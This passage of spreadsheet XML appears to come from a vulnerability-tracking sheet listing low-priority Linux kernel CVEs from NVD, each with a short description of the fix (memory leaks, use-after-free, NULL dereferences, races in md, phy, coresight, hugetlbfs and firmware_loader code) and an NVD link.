      </c>
      <c r="Q641" s="5" t="inlineStr"/>
      <c r="R641" s="5" t="inlineStr"/>
      <c r="S641" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
coresight: etm4x: missing cscfg_csdev_disable_active_config() in perf enable
In the perf enable path, there are missing cases where
cscfg_csdev_disable_active_config() is not called:
  - Branch broadcast is selected but not supported by the hardware
  - etm4_enable_hw() fails
This can lead to a leak of config_desc-&gt;active_cnt.
Fix this by properly calling cscfg_csdev_disable_active_config()
in these error paths.</t>
        </is>
      </c>
      <c r="T641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90273</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90274</t>
        </is>
      </c>
      <c r="D642" s="5" t="inlineStr"/>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="inlineStr"/>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q642" s="5" t="inlineStr"/>
      <c r="R642" s="5" t="inlineStr"/>
      <c r="S642" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
coresight: etm4x: fix underflow for usage of (nrseqstate - 1)
According to IHI006H Embedded Trace Macrocell Architecture
Specification[0], TRCSEQEVR&lt;n&gt; is implemented only when
TRCIDR5.NUMSEQSTATE is 0b100, in which case n ranges from 0 to 2;
otherwise, TRCIDR5.NUMSEQSTATE is 0b000.
IOW, the number of usage in the initialisation or setting
TRCSEQEVR&lt;n&gt; with drvdata-&gt;nrseqstate - 1 in the loop could make
underflow issue when TRCIDR5.NUMSEQSTATE is 0b000.
Therefore, introduce nr_seq_ctrls field and untie it from nrseqstate.
As part of this introduce ETM_MAX_SEQ_TRANSITIONS macro and
apply nr_seq_ctrls and above macro to TRCSEQEVR&lt;n&gt; relevant fields setup.</t>
        </is>
      </c>
      <c r="T642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90274</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90275</t>
        </is>
      </c>
      <c r="D643" s="5" t="inlineStr"/>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="inlineStr"/>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="inlineStr"/>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr"/>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q643" s="5" t="inlineStr"/>
      <c r="R643" s="5" t="inlineStr"/>
      <c r="S643" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/raid1: don't set array_frozen in raid1_takeover()
raid1_takeover() sets conf-&gt;array_frozen = 1 on the newly-allocated
r1conf and nothing ever clears it, so every I/O to the array stalls
permanently once _wait_barrier() sees it stuck at 1.
This used to be harmless: level_store() called mddev_resume() right
after pers-&gt;run(), which called raid1_quiesce(mddev, 0) and cleared
array_frozen back to 0 regardless of what raid1_takeover() set. Commit
b39f35ebe86d ("md: don't quiesce in mddev_suspend()") removed that
quiesce(mddev, 0) call, so the pre-set now sticks.
setup_conf() already zero-initializes the new r1conf via kzalloc, so
just don't set array_frozen here.
Same class of bug as commit 892da88d1cd9 ("md/raid10: fix a
'conf-&gt;barrier' leakage in raid10_takeover()"), also triggered by
b39f35ebe86d.</t>
        </is>
      </c>
      <c r="T643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90275</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90276</t>
        </is>
      </c>
      <c r="D644" s="5" t="inlineStr"/>
      <c r="E644" s="5" t="inlineStr"/>
      <c r="F644" s="5" t="inlineStr"/>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="inlineStr"/>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr"/>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q644" s="5" t="inlineStr"/>
      <c r="R644" s="5" t="inlineStr"/>
      <c r="S644" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/md-llbitmap: stop daemon timer rearm on destroy
llbitmap_destroy() deletes pending_timer before flushing
md_llbitmap_io_wq. However, daemon_work can still be queued or running
after the timer has been deleted, and the daemon path can arm
pending_timer again when it finds dirty chunks that are not ready to
flush yet.
If that happens during teardown, pending_timer can remain armed after
llbitmap is freed and later dereference freed memory.
Add a BITMAP_SHUTDOWN bit to llbitmap-&gt;flags, set it before deleting
the timer, and make the timer and daemon paths stop queueing or rearming
work once teardown starts. Cancel daemon_work before flushing the shared
workqueue so no already queued daemon instance can race with the free.
Use timer_shutdown_sync() so a daemon instance that passed the shutdown
check before teardown cannot rearm the timer afterward.
BITMAP_SHUTDOWN is a runtime-only state. Mask it out when reading and
updating the llbitmap superblock so the shutdown state is never loaded
from disk or persisted to disk.</t>
        </is>
      </c>
      <c r="T644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90276</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90277</t>
        </is>
      </c>
      <c r="D645" s="5" t="inlineStr"/>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="inlineStr"/>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="inlineStr"/>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr"/>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q645" s="5" t="inlineStr"/>
      <c r="R645" s="5" t="inlineStr"/>
      <c r="S645" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/md-llbitmap: prevent create failure bitmap UAF
llbitmap_create() publishes mddev-&gt;bitmap before reading the bitmap
superblock. This is needed because llbitmap_read_sb() can initialize a
new bitmap and flush it through helpers that use mddev-&gt;bitmap.
If llbitmap_read_sb() fails, the old cleanup dropped bitmap_info.mutex
and freed llbitmap before clearing mddev-&gt;bitmap. Readers such as
/proc/mdstat rely on bitmap_info.mutex to keep the bitmap pointer stable
while collecting bitmap stats, so they could observe the stale pointer
after the failed create path released the mutex.
Clear mddev-&gt;bitmap while still holding bitmap_info.mutex, then free the
failed llbitmap after dropping the mutex. This makes mutex-protected
readers see either a live bitmap or no bitmap.</t>
        </is>
      </c>
      <c r="T645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90277</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90278</t>
        </is>
      </c>
      <c r="D646" s="5" t="inlineStr"/>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="inlineStr"/>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr"/>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q646" s="5" t="inlineStr"/>
      <c r="R646" s="5" t="inlineStr"/>
      <c r="S646" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: wait for behind writes before destroying bitmap
__md_stop() destroyed the bitmap before calling mddev_detach(). That made
mddev_detach() skip bitmap_ops-&gt;wait_behind_writes(), because the bitmap
was already disconnected from mddev.
This was still safe for the legacy bitmap because bitmap_destroy() waits
for behind writes itself. llbitmap keeps that wait in its
-&gt;wait_behind_writes() operation instead, while -&gt;destroy() tears down the
llbitmap storage. With the old ordering, RAID1 behind-write completions
could still run after llbitmap storage had been freed.
Call mddev_detach() before md_bitmap_destroy() so the common detach path
can wait for behind writes while the bitmap is still alive. Only destroy
the bitmap after those users are gone.</t>
        </is>
      </c>
      <c r="T646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90278</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90279</t>
        </is>
      </c>
      <c r="D647" s="5" t="inlineStr"/>
      <c r="E647" s="5" t="inlineStr"/>
      <c r="F647" s="5" t="inlineStr"/>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="inlineStr"/>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q647" s="5" t="inlineStr"/>
      <c r="R647" s="5" t="inlineStr"/>
      <c r="S647" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/raid5: round bitmap stripes with sector division
raid5_bitmap_sector_map() aligns the array range to full RAID5 stripe
widths before converting it to component sectors. That width is
chunk_sectors multiplied by the number of data disks, and it is not
always a power of two.
Reproduce with a 4-disk RAID5, 1024-sector chunks, and three data disks.
The full-stripe width is 3072 sectors. For a one-sector write at array
sector 3072, correct rounding gives array range [3072, 6144), which maps
to component range [1024, 2048). The old round_down()/round_up() logic
instead gives [1024, 4096), which maps to [0, 1024).
Use sector_div() based arithmetic so the rounded range is aligned to the
actual RAID5 stripe width.
The deterministic mapper test now reports the fixed component range as
[1024, 2048), while the old mask-based range was [0, 1024).</t>
        </is>
      </c>
      <c r="T647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90279</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90280</t>
        </is>
      </c>
      <c r="D648" s="5" t="inlineStr"/>
      <c r="E648" s="5" t="inlineStr"/>
      <c r="F648" s="5" t="inlineStr"/>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="inlineStr"/>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q648" s="5" t="inlineStr"/>
      <c r="R648" s="5" t="inlineStr"/>
      <c r="S648" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: qcom: qmp-usb: Fix possible NULL-deref on early runtime suspend
There is a small window where the runtime suspend callback may run
after pm_runtime_enable() and before pm_runtime_forbid(). In this
case, a crash occurs because runtime suspend/resume dereferences
qmp-&gt;phy pointer, which is not yet initialized:
        `if (!qmp-&gt;phy-&gt;init_count) {`
This can also happen if user re-enables runtime-pm via the sysfs
attribute before qmp phy is initialized.
Similarly to other qcom phy drivers, introduce a qmp-&gt;phy_initialized
variable that can be used to avoid relying on the possibly uninitialized
phy pointer.</t>
        </is>
      </c>
      <c r="T648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90280</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90281</t>
        </is>
      </c>
      <c r="D649" s="5" t="inlineStr"/>
      <c r="E649" s="5" t="inlineStr"/>
      <c r="F649" s="5" t="inlineStr"/>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="inlineStr"/>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q649" s="5" t="inlineStr"/>
      <c r="R649" s="5" t="inlineStr"/>
      <c r="S649" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: qcom: snps-femto-v2: Fix possible NULL-deref on early runtime suspend
Runtime PM must be enabled before creating the PHY, since phy_create()
only enables runtime PM on the PHY device if it is already enabled on
this parent device. However, the runtime PM callbacks dereference the
hsphy instance, which is not yet ready, leaving a window where a suspend
callback may trigger a NULL pointer dereference.
Take a runtime PM usage reference with pm_runtime_get_noresume() before
enabling runtime PM and release it once the PHY has been created, so that
no runtime suspend can run before the PHY is ready. This also prevents a
short window where an unnecessary runtime suspend can occur.
Use the devres-managed version to ensure PM runtime is symmetrically
disabled during driver removal for proper cleanup.</t>
        </is>
      </c>
      <c r="T649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90281</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90282</t>
        </is>
      </c>
      <c r="D650" s="5" t="inlineStr"/>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="inlineStr"/>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q650" s="5" t="inlineStr"/>
      <c r="R650" s="5" t="inlineStr"/>
      <c r="S650" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: qcom: qmp-usb-legacy: Fix possible NULL-deref on early runtime suspend
There is a small window where the runtime suspend callback may run
after pm_runtime_enable() and before pm_runtime_forbid(). In this
case, a crash occurs because runtime suspend/resume dereferences
qmp-&gt;phy pointer, which is not yet initialized:
        `if (!qmp-&gt;phy-&gt;init_count) {`
This can also happen if user re-enables runtime-pm via the sysfs
attribute before qmp phy is initialized.
Similarly to other qcom phy drivers, introduce a qmp-&gt;phy_initialized
variable that can be used to avoid relying on the possibly uninitialized
phy pointer.</t>
        </is>
      </c>
      <c r="T650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90282</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90283</t>
        </is>
      </c>
      <c r="D651" s="5" t="inlineStr"/>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="inlineStr"/>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q651" s="5" t="inlineStr"/>
      <c r="R651" s="5" t="inlineStr"/>
      <c r="S651" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hugetlbfs: release subpool on fill_super failure
hugetlbfs_fill_super() allocates a hugepage subpool when size or min_size
mount options are specified.  hugepage_new_subpool() may also reserve huge
pages for min_size.
If root dentry creation fails after the subpool is created, the failure
path frees the subpool with kfree().  This bypasses hugepage_put_subpool()
and can leave min_size reservations charged.
Use hugepage_put_subpool() on the failure path, matching the normal
put_super path.</t>
        </is>
      </c>
      <c r="T651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90283</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90284</t>
        </is>
      </c>
      <c r="D652" s="5" t="inlineStr"/>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="inlineStr"/>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q652" s="5" t="inlineStr"/>
      <c r="R652" s="5" t="inlineStr"/>
      <c r="S652" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware_loader: do not queue completed sysfs fallback requests
fw_load_sysfs_fallback() calls device_add() before adding the fw_priv to
pending_fw_head. device_add() publishes the fallback loading interface, so
a userspace helper which discovers the device by scanning sysfs can write 0
to the loading attribute and complete the request before it is queued as
pending.
In that interleaving firmware_loading_store() calls fw_state_done() while
pending_list still points to itself, so it cannot remove an entry from
pending_fw_head. The subsequent unconditional list_add() then queues an
already-completed fw_priv. Once the request is released, pending_fw_head
can retain a pointer to freed memory and the next fallback request can
fault while validating the list.
Only in-flight fallback requests need suspend or reboot abort handling. If
the request is already DONE after device_add(), return success from the
fallback path without sending another uevent, waiting again, or queueing it
as pending. This preserves the invariant that pending_fw_head contains only
active fallback requests.</t>
        </is>
      </c>
      <c r="T652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90284</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90285</t>
        </is>
      </c>
      <c r="D653" s="5" t="inlineStr"/>
      <c r="E653" s="5" t="inlineStr"/>
      <c r="F653" s="5" t="inlineStr"/>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q653" s="5" t="inlineStr"/>
      <c r="R653" s="5" t="inlineStr"/>
      <c r="S653" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Remove redundant VPD flash read in sysfs read path
qla2x00_sysfs_read_vpd() called ha-&gt;isp_ops-&gt;read_optrom() a second time
after releasing optrom_mutex. The repeated read is redundant and, unlike
the first, runs without optrom_mutex held, exposing flash access to
concurrent optrom operations. Drop the duplicate call.</t>
        </is>
      </c>
      <c r="T653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90285</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90286</t>
        </is>
      </c>
      <c r="D654" s="5" t="inlineStr"/>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="inlineStr"/>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q654" s="5" t="inlineStr"/>
      <c r="R654" s="5" t="inlineStr"/>
      <c r="S654" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/gfx6: Use PFP on the compute queues too
On GFX6, the compute rings use the same CP path as
the graphics ring. The only difference is that they
don't support draw commands. (As opposed to GFX7 and
newer which have a separate command parser that is
called MEC for compute queues.)
This means that we have to take into consideration
that the PFP also exists on compute queues on GFX6:
Use PFP for register writes on both graphics and
compute queues.
In the pipeline sync, use the PFP to wait for the
previous fence (and not the ME) to prevent the PFP
from starting to execute the next submission while
the ME is still in the previous submission.
After a VM flush, emit PFP_SYNC_ME on compute
queues as well.</t>
        </is>
      </c>
      <c r="T654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90286</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90287</t>
        </is>
      </c>
      <c r="D655" s="5" t="inlineStr"/>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="inlineStr"/>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q655" s="5" t="inlineStr"/>
      <c r="R655" s="5" t="inlineStr"/>
      <c r="S655" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: sunplus: fix error handling in sp_uphy_init()
Fix the error paths of sp_uphy_init() to undo exactly what each stage
did: return directly if clk_prepare_enable() fails, release only the clock
if reset_control_deassert() fails, and jump to err_reset if
update_disc_vol() fails so the clock and reset are not leaked.</t>
        </is>
      </c>
      <c r="T655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90287</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90288</t>
        </is>
      </c>
      <c r="D656" s="5" t="inlineStr"/>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="inlineStr"/>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr">
        <is>
